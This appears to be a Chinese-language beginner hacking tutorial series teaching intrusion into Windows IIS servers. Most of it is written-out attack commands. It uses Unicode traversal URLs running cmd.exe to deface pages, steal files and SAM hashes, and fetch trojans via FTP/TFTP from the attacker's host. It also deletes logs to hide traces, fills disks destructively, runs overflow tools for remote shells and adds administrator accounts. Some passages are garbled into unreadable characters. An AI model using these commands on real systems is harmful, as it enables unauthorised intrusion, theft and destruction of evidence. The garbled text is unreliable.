ps:忘了說一聲,順便掃一下7626,冰河有也說不準哦:)

若有ftp,那就用用匿名登陸。自己動手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望

telnet 在!好!telnet 111.111.222.222,出現視窗了吧!嗯?要密碼@蠢賜芑共皇淺蹲⒁饢拿饔糜錚海┧奼悴賂觶砈耍寥耍???????湵捩摯?湵捩摯???榬獩???槮煤?犛湯灴條?硥整摮????????????????????????????????斆???????捳湡???????????牢? 牢???????????????????????????????????????????????????????????????????戼? 戼????????????????????????????????????????????????????湵捩摯??????????痚楮潣敤??????????????

基礎知識(2)

今天我們談談unicode漏洞,這可是基礎中的基礎,重點裡的重點,不懂的一定要好好學。

2000年10月17日中聯綠盟釋出了以下的安全公告:

微軟IIS 4.0 / 5.0 擴充套件UNICODE目錄遍歷漏洞

遠端漏洞:是

本地漏洞:是

釋出日期:2000年10月17日

更新日期:2000年10月17日

受影響的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

這可是中國乃至全球網路安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打補丁的死路一條。

下面開始正式學習:

一,UNICODE漏洞的原理

此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,中國臺灣繁體中文也同樣存在這樣的漏洞。

中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中

� -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/’

�/ -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\’

在NT4中/編碼為�

在英文版裡: WIN2000英文版�

在中文win2k裡:�

此外還有多種編碼,不一一闡述。

本文例子均以win2k為準,其他型別請自行替換。

基礎知識(3)

二,一切從基礎開始

由於winnt\system32\cmd.exe的存在,使遠端執行命令變為可能,在瀏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)

11.11.22.22/scripts/..�../winnt/system32/cmd.exe?/c+dir

學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。

如果成功,那麼在瀏覽區可看到如下資訊:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有檔案,實際上有一大堆)

是不是有自己機器的感覺了,正點!就是這種感覺!

cmd.exe相當與dos裡的command.com,因此,我們可以執行很多命令了!

大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:

11.11.22.22/scripts/..�../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

會dos的朋友一定懂其意義了,不懂的請去看書 .

不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!

三,實戰演練

1,修改主頁!(是不是很爽?)

一般主頁位置在c:\inetpub\wwwroot下,但要是改了路徑,就需要找找了。

最方便的方法:在瀏覽器裡輸入 http://11.11.22.22/.ida要是有漏洞,那在瀏?..皇俏頤塹氖籽 ?/a>

分析法:用dir看各個碟符的根目錄,看可疑的就進去看,運氣好的在一分鐘裡找到,這要看運氣和直覺。

dir/s 法:首先在看其主頁,找個圖片或連線,看它的檔名,比如,11.11.22.22首頁上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif,然後我們利用unicode輸入這條命令dir c:\iloveu.gif /s意味著查詢c盤下所有目錄裡的iloveu.gif,注意實際應用時別忘了把空格改為+,如果沒有繼續找d盤,很快就能確定主頁目錄的。

找到了目錄,就要對它開刀了!一般預設收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個,現在我們確定11.11.22.22中為index.htm

那麼我們就修改它吧!

最方便的方法:echo法。echo是一個系統命令,主要用於設定迴應開關,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat裡並刪除原有內容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不刪除原有內容,這樣我們就可以逍遙的改了。

11.11.22.22/scripts/..�../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

迴應為:HTTP 500 - 內部伺服器錯誤

通過對cmd的分析,袁哥得出一條簡便的方法,加入”符號

11.11.22.22/scripts/..�../winnt/system32/cmd”.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..�../winnt/system32/cmd”.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

迴應為:cgi錯誤,不用理會

兩條命令一下,呵呵,再看看11.11.22.22,是不是烙上我們的大名了?不錯吧

而在實際操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo

例如:11.11.22.22/scripts/..�../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..�../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上傳法:echo有點不講道理,把人家的檔案破壞了,要是想在主頁上增光添彩,那就應該用改好的主頁

基礎知識(4)

上傳,這個我們後面介紹。

幾點忠告:

1,對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德

2,echo前記得幫他們做好備份

3,不準在主頁里加入惡性語句

2,下載檔案

要是有什麼有用的檔案被你發現,那我們如何下載呢?

最簡單的方法:把檔案copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對檔名進行修改,總之不能暴露。

別的方法:對不起,沒想好:)

3,最重要的上傳

一般方法:ftp法

首先建一個ftp指令碼檔案:c:\hehe.haha(名字亂取把),申請一個ftp賬號,然後用echo吧

echo+open ftp.cshu.com(ftp主機) > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是使用者名稱)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密碼)

echo+get setup.exe >> c:\hehe.haha 要下載的檔案

echo+quit >> c:\hehe.haha

完了以後:ftp+/s:c:\hehe.haha,由於是ftp主機,那麼速度一定很快,過一會setup.exe就會出現在當前目錄了(也就是cmd所在目錄)

別忘了先上傳到ftp主機,不要做馬大哈哦!

最簡單的方法:tftp法。

這種方法不用中轉伺服器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp伺服器,利用漏洞機器來下載(注意,執行tftp時不要執行其他的ftp軟體)

在這裡我推薦cisco tftp server,自己去找找把,實在沒有來找我:)

安裝好後執行,別忘了設定好預設目錄,否則會找不到檔案

tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在預設目錄裡)

1.2.3.4為你的ip,用unicode執行一下,會看到tftp server裡有反應了,這就好了,不一會,檔案就傳上去了,方便把!

學會了上傳,我們就可以好好改主頁,還可以上傳木馬,還可以把程式放上去執行…………(執行程式和在dos裡一樣)

4,如何清除痕跡

雖然國內主機紀錄ip的不是很多,但萬事小心為妙,unicode許可權達不到admin。用cleaniislog行不通,就…………直接刪吧!

C:\winnt\system32\logfiles*.*

C:\winnt\ssytem32\config*.evt

C:\winnt\system32\dtclog*.*

C:\winnt\system32*.log

C:\winnt\system32*.txt

C:\winnt*.txt

C:\winnt*.log

全……擦掉!

四,細節問題。

1,遇到長檔名怎麼辦?

c:\program files\

就用c:”program20%files”\

2,遇到空格怎麼辦?
%代替嘍,或者xx yy=xxyy~1
基礎知識(5)

%代替嘍,或者xx yy=xxyy~1

3,如何做個很大的檔案?

目的就是破壞啦!我不喜歡不過教教你們啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要亂來啊!

4,輸入命令,沒反應或反應不對。

:)請檢查檢查再檢查命令的正確性,可能沒有漏洞,那就閃人!看在你看到這裡那麼給我面子的份上,在給你幾個吧!

不一定有用哦!

5,如何找到unicode漏洞的主機

呵呵:)最好的方法自然是………………一個一個ping,一個一個試嘍:)

不要打我呀!我說我說。最好找一個cgi掃描器,unicode查詢器多如牛毛,隨便找個吧!

6,我copy,del檔案,怎麼顯示aceess denined?

這個不好辦了,由於unicode所擁有的許可權有限,出現上述情況很正常,我們要做的便是提高自己的許可權!

這個我會在今後介紹,現在你可以試試attrib

attrib -r -h -s c:\autoexec.bat

再對autoexec.bat進行操作,看看有沒有效果,成功率不高,不好意思!

7,我黑了主頁,天下無敵?

我本來想對你說:“見你的鬼去吧!”不過想想不大禮貌,有失我紳士風度,所以改個口

echo主頁或改主頁在不懂黑客的人看起來很了不起,不過,它最多算是一個基礎,拿到admin才是我們的終極目標!

對cshu全體成員來說,不準去改正在建立的網頁!這是我們的原則!

要是你想耍耍威風,那也可以理解,那就去黑外國的,或者url欺騙也是個好選擇

8,我如何做更多的事?

第一,努力提高許可權

第二,由於cmd的限制,我們可以做的不多,那就要程式幫忙,上傳吧!切記,要隱祕!

一,frontpage擴充套件攻擊。

為什麼把它放第一位呢?原因很簡單,它最最方便,frontpage伺服器擴充套件是一種方便的遠端站點管理功能,可是由於某些網管注意文明用語的疏忽(為什麼注意文明用語滿街飛?)不設定訪問密碼,如果那樣的話,我們只要用一個frontpage就可以黑它了!!這完全不是黑客工具,但它確實辦到了,還要感謝注意文明用語網管和微軟啊!

具體做法:

1,準備frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

2,找一臺有frontpage擴充套件的主機,可以用流光,也可以用搜索引擎查詢/_vti_pvt/,這是frontpage擴充套件的標誌。

3,接下來開啟frontpage,(媽媽:你在幹什麼?回答:做網頁!媽媽:好孩子!)檔案選單下選擇“開啟站點”,然後在資料夾框裡寫入 http://11.11.22.22(我習慣用這個做例子,以…僮魍澄募恕?/a>

我的看法:

這個漏洞只能說明網管的疏忽,對我們而言是沒有什麼利用價值的,只可以改改網頁,也許這也夠了,但要進一步控制主機,此漏洞就無能為力。消遣時可以玩玩。

二,iis.printer溢位攻擊

據說緩衝區溢位攻擊是黑客入侵時70%所選的方法,看起來有點誇張,但確實有道理,因為暴力密碼破解在網路上變得非常之慢,而像unicode的解碼漏洞所取得的許可權又太低,而緩衝區溢位一般可取得system許可權,是非常有用的!

具體原理我也不是很清楚,只能說個大概:當我們向系統發出超出緩衝區大小的資料處理請求時,便會引發溢位,並彈出錯誤對話方塊,我們常看到的“非法操作”其實也是可能是由於溢位。而當溢位時,eip發生錯誤,有彙編知識的朋友應該記得,eip是控制執行程式碼的位置(順便問一下,有沒有會crack的高人,記得做我老師)這時加入一段惡性程式碼,算好發生溢位時的eip值,這樣溢位時就會執行惡性程式碼而不是當掉。非法操作我們知道多的不得了,因此……溢位攻擊是非常強大的!

由於彙編對於我們來說較難掌握,加之對溢位的瞭解很有限,那麼我們只能藉助高手們的程式來黑了。

具體方法:

1,準備iishack,本站有下載,該版本可以對多種系統進行攻擊。

2,用x-scan或流光掃描一個有iis.printer漏洞的主機,然後就可以攻擊了。

3,在命令列方式執行iis5hack (主機ip) (埠號,預設80)(系統代號,具體可參考程式的說明) ( shell口)

例如:iis5hack 11.11.22.22 80 1 111(以為在111埠開一個shell)

4,用nc或telnet連上,nc/telnet 11.11.22.22 111,成功的話就可以控制機器了,加個使用者,做個代理……

我的看法:

這算是一個比較有用的漏洞了,它能幫助我們取得system許可權,其實和admin差不了多少了,對於做一臺跳板是非常有利的,希望大家熟練掌握。

三,idq/ida漏洞溢位攻擊

這是時下很熱門的了,原理和上面的printer相似,目前我只找到了iis5的攻擊程式,在cshu裡也可以找到的,我們準備的是snake的gui版本,很方便的。

具體方法:

1,準備snakeiis溢位程式。可以從本站下載。

2,ida/idq漏洞很多的,但win2k的伺服器就不是那麼普遍了,所以用你熟練的掃描器去找一打win2k的機器吧。

3,程式的介面是很傻瓜的,把ip填入,選擇好型別,按下溢位按鈕,顯示shellcode傳送完畢。

4,telnet/nc到你設定好的埠,如果成功的話,會顯示目錄下的資訊(因為預設shellcode是dir)

5,歡呼吧!再次溢位,別忘了改shellcode為你想要的程式碼哦。

6,重複4,很快一臺新鮮的win2k被你控制了!

我的看法:

我很喜歡用這種攻擊,因為win2k的3389可以很方便的為我做事,省力地搞到一臺win2k,然後慢慢享用,爽到根尖細胞啊!大家應該掌握這項方法。

四,*bsd telnetd溢位攻擊

又是溢位,不過這個可是真正的熱點哦,最近紅盟等大型安全網站被黑就是因為這個!所以看看吧

具體方法:

1,使用fbsdhack for win2k來攻擊,本站有下載的

2,還是要找到這樣的主機,一般是xnix的,比較少的,用專門的掃描器吧,我會在不久放出來。

3,等吧!這個漏洞要傳送的資訊很大,大約16mb,可怕吧,所以最好用高速肉雞

4,有幸成功了,記得請我吃飯!

我的看法:

這個漏洞的利用比較有難度,從找機器開始就是。但作為黑客愛好者,我們沒有理由去迴避它!

五,密碼暴力破解

這是最最原始,也是最最基本的攻擊的方式了,利用字典檔案或暴力模式,對密碼進行探測。費時費力,但若有經驗的話,可以縮短這一過程。

具體方法:

1,找一個破解器,有ftp,http,smtp,pop3,telnet等等型別。

2,找到一臺相應的主機。

3,設定一番,上路吧!你可以睡覺,可以去machine(就是做作業),可以去泡妞……就是不要傻等。為什麼呢?因為會傷視力的:)怎麼倒了一片,起來起來!

4,萬一成功了(之所以用這個詞,是因為成功率很低的)表明你運氣旺,趕緊下線,買彩票去吧

大家好,這幾天被cgi程式搞得頭昏腦脹,主要還是51的錯,什麼破東西,那麼多錯誤!現在只好暫時借人家的地方用。

這是菜鳥操的最後第二節,說實話我還可以寫很多的,但是作業還欠了一大堆:(為什麼我沒有滿舟的狗屎運?算了算了,我不合那種欺世盜名之輩一般見識,開始做操吧!

不知道大家對unicode和溢位攻擊是不是熟練了?沒有的要加油哦!今天我們來談談許可權的提升。

在windows系統中,最高的許可權掌握在administrators的手裡,在xnix中稱為root,我們要完全掌握一臺機器,拿到admin是不可或缺的。

首先說說最簡單的:system to admin

當我們用溢位攻擊成功後,其實我們已經拿到了system許可權(具體看每種攻擊而可能有所不同)這時我們很容易拿到admin許可權。首先看看一下命令:

net user 察看使用者表 net user username pass /add(新增密碼為pass的使用者username)

net localgroup 察看組 net localgroup guests cshu /add 把cshu使用者加入guests組

net use \ip\ipc$ “password” /user:username 這是遠端連線的命令

假如我們溢位了11.11.22.22,那麼這樣做吧!

net user (看到了iusr_machinename的使用者了,它一般沒什麼許可權的)

基礎知識(6)

net user iusr_machinename cshu (把它的密碼設為cshu)

net localgroup administrators iusr_machinename /add(加入administrators組)

這樣我們就擁有了iusr_machinename這一賬號,admin許可權,簡單吧!

熟悉一下net use 命令:

net use \11.11.22.22\ipc$ “cshu” /user:iusr_machinename 建立連線

copy c:\haha.exe \11.11.22.22\adminhaha.exec:\winnt\system32c.d$,就表示c,d盤

net time \11.11.22.22 看到了時間了,比如是8點

at \11.11.22.22 8:03 haha.exe 就會在8點3分執行。

net use \11.11.22.22 /delete 斷開連線

應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了,admin是最高許可權,所以沒有限制的:)

是不是很簡單?所以我是溢位是很厲害的攻擊方法。

3389知道吧!如果能進入,那麼用上面的命令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關於3389的好文章)

總的來說,還是unicode的機器最多,為什麼注意文明用語網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。

首先,我們檢查一下unicode在這臺機器上的許可權,一般看讀寫許可權和執行許可權。用copy 或del命令便可確定讀寫許可權,然後上傳檔案執行一下便可知道執行許可權。

1,如果我們可以對winnt\repair和winnt\config進行訪問,sam檔案就在裡面(win2k裡是sam,nt4裡是sam._)那麼用tftp 把get改成put下載下來,或者把它複製到inetpub\wwwroot下,改成zip下載。

拿到sam後,用lc3破解版暴力破解吧,這種方法比較費時。

2,要是有執行許可權,拿就拋個木馬上去吧!雖說木馬可能也會沒有許可權,但自啟動的模式在admin登陸後可能會自己提升了許可權。要注意的是,最好放最新的木馬,因為木馬很容易被防毒軟體查殺!

3,其實和2差不多,只不過變成了鍵盤記錄器,選個國產的,一般防毒軟體不會殺出來,認真配置好後傳上去,下線睡覺或是做家務去!等到網管用了機器,密碼就會被紀錄下來,我們在去取,admin就順利到手了:)

4,getadmin和pipeupadmin,前者是nt4用的,後者是2000。看看幫助知道使用方法後(其實猜都猜得到)就可以提升一個使用者的許可權,有一步登天的感覺!

5,手工做個bat檔案,裡面是建立使用者等命令,然後把它放到自啟動下,有很多途徑:documents and settings下的開始選單下的啟動,知道了吧,至於要順利放進去的話,會遇到空格長名等等問題,就看你的基本功了。win.ini裡有load,加進去。還有便是登錄檔,好好研究一下regedit.

6,本地溢位。這個比較高深,我能告訴大家的只是,去四處找找本地溢位程式。

總的來說,unicode改主頁是非常簡單的,但是若是要取得更高的許可權,就要一番努力,上面的方法只是